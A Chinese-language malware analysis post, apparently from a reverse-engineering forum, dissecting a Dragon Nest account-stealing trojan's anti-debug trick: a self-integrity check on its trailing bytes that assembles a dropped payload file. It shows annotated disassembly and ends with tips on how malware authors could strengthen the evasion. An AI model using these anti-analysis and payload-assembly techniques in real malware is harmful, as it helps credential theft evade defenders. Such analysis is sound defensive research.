首先说明,这种antidebug方式只会使部分分析者一时疏忽造成困扰,玩的是巧,而不是技术~
而确实在最开始的时候也给我造成了一些困扰,当然了,我很菜~ 言归正传~
这是一个“龙之谷”的盗号木马
1,从自身提取一个名为"MWAI"的资源,并释放到系统临时文件夹中,名称为kb****.bin (*的是0~9的随即数字)。
2,接着进行自身验证,通过比较当前进程文件的最后8位是否为7001000000010000来判断木马是否完整(比如脱壳的版本~这个木马用的PEcompact2.x壳),如果验证通过,则提取当前木马文件的后0x170个字节内容追加到刚刚释放的bin文件中,来完成bin文件的组装。
3,加载组装后的bin,并安装全局WH_GETMESSAGE钩子来获取账号信息
组装函数:
00402A2E /$ 55 push ebp
00402A2F |. 8BEC mov ebp, esp
00402A31 |. 81EC 6C010000 sub esp, 16C
00402A37 |. 8065 D4 00 and byte ptr [ebp-2C], 0
00402A3B |. 53 push ebx
00402A3C |. 56 push esi
00402A3D |. 57 push edi
00402A3E |. C645 C8 4B mov byte ptr [ebp-38], 4B ; 填充"Kernel32.dll"
00402A42 |. C645 C9 65 mov byte ptr [ebp-37], 65
00402A46 |. C645 CA 72 mov byte ptr [ebp-36], 72
00402A4A |. C645 CB 6E mov byte ptr [ebp-35], 6E
00402A4E |. C645 CC 65 mov byte ptr [ebp-34], 65
00402A52 |. C645 CD 6C mov byte ptr [ebp-33], 6C
00402A56 |. C645 CE 33 mov byte ptr [ebp-32], 33
00402A5A |. C645 CF 32 mov byte ptr [ebp-31], 32
00402A5E |. C645 D0 2E mov byte ptr [ebp-30], 2E
00402A62 |. C645 D1 64 mov byte ptr [ebp-2F], 64
00402A66 |. C645 D2 6C mov byte ptr [ebp-2E], 6C
00402A6A |. C645 D3 6C mov byte ptr [ebp-2D], 6C
00402A6E |. 60 pushad
00402A6F |. 61 popad
00402A70 |. 8D45 C8 lea eax, dword ptr [ebp-38]
00402A73 |. 50 push eax ; /FileName
00402A74 |. FF15 00604000 call dword ptr [<&kernel32.LoadLibraryA>>; \LoadLibraryA
00402A7A |. 8945 FC mov dword ptr [ebp-4], eax ; ebp-4 = HMODULE kernel32.dll
00402A7D |. 60 pushad
00402A7E |. 61 popad
00402A7F |. 33DB xor ebx, ebx
00402A81 |. 395D FC cmp dword ptr [ebp-4], ebx
00402A84 |. 0F84 E4010000 je 00402C6E ; 判断LoadLibrary加载kernel32.dll是否成功
00402A8A |. 8D45 A4 lea eax, dword ptr [ebp-5C] ; eax = "athA"
00402A8D |. C645 A4 47 mov byte ptr [ebp-5C], 47
00402A91 |. 50 push eax
00402A92 |. C645 A5 65 mov byte ptr [ebp-5B], 65
00402A96 |. FF75 FC push dword ptr [ebp-4]
00402A99 |. C645 A6 74 mov byte ptr [ebp-5A], 74
00402A9D |. C645 A7 4D mov byte ptr [ebp-59], 4D
00402AA1 |. C645 A8 6F mov byte ptr [ebp-58], 6F
00402AA5 |. C645 A9 64 mov byte ptr [ebp-57], 64
00402AA9 |. C645 AA 75 mov byte ptr [ebp-56], 75
00402AAD |. C645 AB 6C mov byte ptr [ebp-55], 6C
00402AB1 |. C645 AC 65 mov byte ptr [ebp-54], 65
00402AB5 |. C645 AD 46 mov byte ptr [ebp-53], 46
00402AB9 |. C645 AE 69 mov byte ptr [ebp-52], 69
00402ABD |. C645 AF 6C mov byte ptr [ebp-51], 6C
00402AC1 |. C645 B0 65 mov byte ptr [ebp-50], 65
00402AC5 |. C645 B1 4E mov byte ptr [ebp-4F], 4E
00402AC9 |. C645 B2 61 mov byte ptr [ebp-4E], 61
00402ACD |. C645 B3 6D mov byte ptr [ebp-4D], 6D
00402AD1 |. C645 B4 65 mov byte ptr [ebp-4C], 65
00402AD5 |. C645 B5 41 mov byte ptr [ebp-4B], 41
00402AD9 |. 885D B6 mov byte ptr [ebp-4A], bl ; 经过一串填充之后eax = "GetModuleFileNameA"
00402ADC |. E8 50EEFFFF call 00401931 ; GetProcAddress GetModuleFileNameA
00402AE1 |. 8BF0 mov esi, eax
00402AE3 |. 8D45 D8 lea eax, dword ptr [ebp-28]
00402AE6 |. 50 push eax
00402AE7 |. C645 D8 43 mov byte ptr [ebp-28], 43 ; 填充CloseHandle
00402AEB |. FF75 FC push dword ptr [ebp-4]
00402AEE |. C645 D9 6C mov byte ptr [ebp-27], 6C
00402AF2 |. C645 DA 6F mov byte ptr [ebp-26], 6F
00402AF6 |. C645 DB 73 mov byte ptr [ebp-25], 73
00402AFA |. C645 DC 65 mov byte ptr [ebp-24], 65
00402AFE |. C645 DD 48 mov byte ptr [ebp-23], 48
00402B02 |. C645 DE 61 mov byte ptr [ebp-22], 61
00402B06 |. C645 DF 6E mov byte ptr [ebp-21], 6E
00402B0A |. C645 E0 64 mov byte ptr [ebp-20], 64
00402B0E |. C645 E1 6C mov byte ptr [ebp-1F], 6C
00402B12 |. C645 E2 65 mov byte ptr [ebp-1E], 65
00402B16 |. 885D E3 mov byte ptr [ebp-1D], bl
00402B19 |. E8 13EEFFFF call 00401931 ; GetProcAddress CloseHandle
00402B1E |. 83C4 10 add esp, 10
00402B21 |. 8945 A0 mov dword ptr [ebp-60], eax
00402B24 |. 8D45 E4 lea eax, dword ptr [ebp-1C]
00402B27 |. C645 E4 43 mov byte ptr [ebp-1C], 43
00402B2B |. 50 push eax
00402B2C |. 8D45 B8 lea eax, dword ptr [ebp-48]
00402B2F |. 50 push eax ; /FileName
00402B30 |. C645 E5 72 mov byte ptr [ebp-1B], 72 ; |填充"CreateFileA"
00402B34 |. C645 E6 65 mov byte ptr [ebp-1A], 65 ; |
00402B38 |. C645 E7 61 mov byte ptr [ebp-19], 61 ; |
00402B3C |. C645 E8 74 mov byte ptr [ebp-18], 74 ; |
00402B40 |. C645 E9 65 mov byte ptr [ebp-17], 65 ; |
00402B44 |. C645 EA 46 mov byte ptr [ebp-16], 46 ; |
00402B48 |. C645 EB 69 mov byte ptr [ebp-15], 69 ; |
00402B4C |. C645 EC 6C mov byte ptr [ebp-14], 6C ; |
00402B50 |. C645 ED 65 mov byte ptr [ebp-13], 65 ; |
00402B54 |. C645 EE 41 mov byte ptr [ebp-12], 41 ; |
00402B58 |. 885D EF mov byte ptr [ebp-11], bl ; |
00402B5B |. C645 B8 4B mov byte ptr [ebp-48], 4B ; |填充"Kernel32.dll"
00402B5F |. C645 B9 65 mov byte ptr [ebp-47], 65 ; |
00402B63 |. C645 BA 72 mov byte ptr [ebp-46], 72 ; |
00402B67 |. C645 BB 6E mov byte ptr [ebp-45], 6E ; |
00402B6B |. C645 BC 65 mov byte ptr [ebp-44], 65 ; |
00402B6F |. C645 BD 6C mov byte ptr [ebp-43], 6C ; |
00402B73 |. C645 BE 33 mov byte ptr [ebp-42], 33 ; |
00402B77 |. C645 BF 32 mov byte ptr [ebp-41], 32 ; |
00402B7B |. C645 C0 2E mov byte ptr [ebp-40], 2E ; |
00402B7F |. C645 C1 64 mov byte ptr [ebp-3F], 64 ; |
00402B83 |. C645 C2 6C mov byte ptr [ebp-3E], 6C ; |
00402B87 |. C645 C3 6C mov byte ptr [ebp-3D], 6C ; |
00402B8B |. 885D C4 mov byte ptr [ebp-3C], bl ; |
00402B8E |. FF15 00604000 call dword ptr [<&kernel32.LoadLibraryA>>; \LoadlibraryA Kernel32.dll
00402B94 |. 50 push eax
00402B95 |. E8 97EDFFFF call 00401931 ; GetProcAddress CreateFileA
00402B9A |. 59 pop ecx
00402B9B |. 8945 9C mov dword ptr [ebp-64], eax
00402B9E |. 59 pop ecx
00402B9F |. 8D85 94FEFFFF lea eax, dword ptr [ebp-16C]
00402BA5 |. 68 04010000 push 104 ; MAX_PATH
00402BAA |. 50 push eax ; buffer
00402BAB |. 53 push ebx ; 0
00402BAC |. FFD6 call esi ; GetModuleFileNameA 获取当前进程路径
00402BAE |. 53 push ebx ; 0
00402BAF |. 53 push ebx ; 0
00402BB0 |. 6A 03 push 3 ; OPEN_EXISTING
00402BB2 |. 53 push ebx ; 0
00402BB3 |. 6A 01 push 1 ; FILE_SHARE_READ
00402BB5 |. 8D85 94FEFFFF lea eax, dword ptr [ebp-16C]
00402BBB |. 68 00000080 push 80000000
00402BC0 |. 50 push eax
00402BC1 |. FF55 9C call dword ptr [ebp-64] ; CreateFileA 返回当前进程的HANDLE
00402BC4 |. 8B35 18604000 mov esi, dword ptr [<&kernel32.SetFileP>; kernel32.SetFilePointer
00402BCA |. 6A 02 push 2 ; /Origin = FILE_END
00402BCC |. 53 push ebx ; |pOffsetHi
00402BCD |. 6A FC push -4 ; |OffsetLo = FFFFFFFC (-4.)
00402BCF |. 50 push eax ; |hFile
00402BD0 |. 8945 FC mov dword ptr [ebp-4], eax ; |
00402BD3 |. FFD6 call esi ; \SetFilePointer 设置文件指针到结尾 -4处
00402BD5 |. 8D45 F4 lea eax, dword ptr [ebp-C]
00402BD8 |. 8B3D 14604000 mov edi, dword ptr [<&kernel32.ReadFile>; kernel32.ReadFile
00402BDE |. 53 push ebx ; /pOverlapped
00402BDF |. 50 push eax ; |pBytesRead
00402BE0 |. 8D45 F0 lea eax, dword ptr [ebp-10] ; |
00402BE3 |. 6A 04 push 4 ; |BytesToRead = 4
00402BE5 |. 50 push eax ; |Buffer
00402BE6 |. FF75 FC push dword ptr [ebp-4] ; |hFile
00402BE9 |. FFD7 call edi ; \ReadFile 读出文件最后的四个字节内容
00402BEB |. 817D F0 00000>cmp dword ptr [ebp-10], 10000 ; 与10000对比
00402BF2 |. 75 74 jnz short 00402C68 ; 判断文件的完整性,病毒原始文件的最后四个字节的值就是0x10000
00402BF4 |. 6A 02 push 2 ; /Origin = FILE_END
00402BF6 |. 53 push ebx ; |pOffsetHi = 0
00402BF7 |. 6A F8 push -8 ; |OffsetLo = FFFFFFF8 (-8.)
00402BF9 |. FF75 FC push dword ptr [ebp-4] ; |hFile
00402BFC |. FFD6 call esi ; \SetFilePointer 设置文件指针到FILE_END - 8
00402BFE |. 8D45 F4 lea eax, dword ptr [ebp-C]
00402C01 |. 53 push ebx ; /POverlapped = NULL
00402C02 |. 50 push eax ; |pBytesRead
00402C03 |. 8D45 F8 lea eax, dword ptr [ebp-8] ; |
00402C06 |. 6A 04 push 4 ; |BytesToRead = 4
00402C08 |. 50 push eax ; |Buffer
00402C09 |. FF75 FC push dword ptr [ebp-4] ; |hFile
00402C0C |. FFD7 call edi ; \ReadFile 读去当前文件的FILE_END - 8 起的4个字节
00402C0E |. 8B45 F8 mov eax, dword ptr [ebp-8] ; 如果是病毒原始文件,这块应该是0x170
00402C11 |. 6A 02 push 2 ; /Origin = FILE_END
00402C13 |. F7D8 neg eax ; |取补
00402C15 |. 53 push ebx ; |pOffsetHi
00402C16 |. 50 push eax ; |如果是原始病毒文件,这里应该是十进制的-368
00402C17 |. FF75 FC push dword ptr [ebp-4] ; |hFile
00402C1A |. FFD6 call esi ; \SetFilePointer 设置文件指针到FILE_END - 368
00402C1C |. FF75 F8 push dword ptr [ebp-8] ; /如果是病毒原始文件,这块应该是0x170
00402C1F |. FF15 70604000 call dword ptr [<&MSVCRT.malloc>] ; \如果是病毒原始文件,则分配0x170大小的堆空间
00402C25 |. 59 pop ecx
00402C26 |. 8945 98 mov dword ptr [ebp-68], eax ; 把分配的堆指针传入局部变量
00402C29 |. 8D4D F4 lea ecx, dword ptr [ebp-C]
00402C2C |. 53 push ebx ; 0
00402C2D |. 51 push ecx
00402C2E |. FF75 F8 push dword ptr [ebp-8] ; 0x170
00402C31 |. 50 push eax ; malloc分配的堆空间
00402C32 |. FF75 FC push dword ptr [ebp-4] ; hFile 当前病毒的文件handle
00402C35 |. FFD7 call edi ; ReadFile 读取病毒文件的最后368个字节内容
00402C37 |. 53 push ebx
00402C38 |. 53 push ebx
00402C39 |. 6A 03 push 3 ; OPEN_EXISTING
00402C3B |. 53 push ebx
00402C3C |. 6A 01 push 1 ; FILE_SHARE_READ
00402C3E |. 68 000000C0 push C0000000 ; GENERIC_READ | GENERIC_WRITE
00402C43 |. FF75 08 push dword ptr [ebp+8] ; LPCTSTR lpFileName
00402C46 |. FF55 9C call dword ptr [ebp-64] ; CreateFileA 打开刚刚在临时文件夹下释放的bin文件
00402C49 |. 6A 02 push 2 ; FILE_END
00402C4B |. 8BF8 mov edi, eax
00402C4D |. 53 push ebx ; PLONG lpDistanceToMoveHigh 0
00402C4E |. 53 push ebx ; LONG lDistanceToMove 0
00402C4F |. 57 push edi ; 刚在临时文件夹下创建的bin文件的handle
00402C50 |. FFD6 call esi ; SetFilePointer 设置文件指针到文件的结尾
00402C52 |. 8D45 F4 lea eax, dword ptr [ebp-C]
00402C55 |. 53 push ebx ; /pOverlapped = NULL
00402C56 |. 50 push eax ; |pBytesWritten
00402C57 |. FF75 F8 push dword ptr [ebp-8] ; |nBytesToWrite 如果是病毒原始文件,则这里应该是0x170
00402C5A |. FF75 98 push dword ptr [ebp-68] ; |Buffer
00402C5D |. 57 push edi ; |hFile
00402C5E |. FF15 10604000 call dword ptr [<&kernel32.WriteFile>] ; \WriteFile 从当前文件中提取并在bin文件的末尾写入0x170个字节
00402C64 |. 57 push edi ; 至此完成了bin文件的组装,先验证文件是否被脱壳了,如果没脱壳,说明没在调试,则完成bin文件的组装,从自身中提取最后的0x170个字节,然后写入bin文件的结尾
00402C65 |. FF55 A0 call dword ptr [ebp-60] ; CloseHandle
00402C68 |> FF75 FC push dword ptr [ebp-4]
00402C6B |. FF55 A0 call dword ptr [ebp-60] ; CloseHandle 关闭文件handle
00402C6E |> 5F pop edi
00402C6F |. 5E pop esi
00402C70 |. 33C0 xor eax, eax ; 返回0
00402C72 |. 5B pop ebx
00402C73 |. C9 leave
00402C74 \. C3 retn
病毒作者可以选择把关键的东西放到这最后的0x170字节中,可以在某种程度上达到一箭双雕,既能防止反汇编器分析,还能让分析者在释放的bin中打转转。
试想分析者分析时晃过了这块,bin又不全~~
如果顺便把bin也加上壳效果会更好~
当然这一些都是基于分析者的能力和态度~~
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课